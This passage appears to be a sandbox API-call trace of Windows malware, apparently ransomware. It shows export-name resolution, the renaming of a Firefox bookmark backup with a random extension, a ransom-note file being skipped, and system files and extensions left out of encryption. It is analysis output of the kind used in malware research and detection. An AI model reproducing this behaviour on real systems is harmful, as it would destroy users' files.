lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.757] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.757] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.757] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.757] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.757] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.757] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.757] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.757] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.757] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.758] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.758] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.758] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.758] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.758] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.758] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.758] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.758] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.758] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.758] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.758] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.758] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.758] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.758] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.758] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.758] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.758] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.758] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.758] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.759] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.759] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.759] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.759] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.759] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.759] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.759] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.759] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.759] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.759] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.759] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.759] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.759] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.759] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.759] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.759] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.759] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.759] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.760] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.760] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.760] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.760] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.760] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.760] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.760] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.760] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.760] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.760] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.760] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.760] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.760] lstrlenA (lpString="DELETEATOM") returned 10 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.760] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.760] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.760] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.760] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.760] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.760] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.761] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.761] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.761] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.761] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.761] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.761] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.761] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.761] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.761] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.761] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.761] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.761] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.761] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.761] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.761] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.761] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.761] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.761] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.761] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.762] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.762] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.762] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.762] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.762] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.762] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.762] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.762] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.762] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.762] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.762] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.762] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.762] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.762] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.762] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.762] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.762] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.762] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.763] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.763] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned 131 [0080.763] wsprintfW (in: param_1=0x3f2d238, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.qSwZ2Up") returned 139 [0080.763] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.qSwZ2Up" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.qswz2up"), dwFlags=0x0) returned 1 [0080.763] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.764] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.764] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.764] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac47b080, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac47b080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac47b080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.764] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.764] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac454f20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac454f20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac454f20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.764] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.764] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.764] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.764] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.764] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.765] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.765] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0080.765] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.765] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0080.765] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\jkbimi8.tmp" [0080.765] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.765] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.765] CloseHandle (hObject=0x0) returned 0 [0080.765] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.765] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac454f20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac454f20, 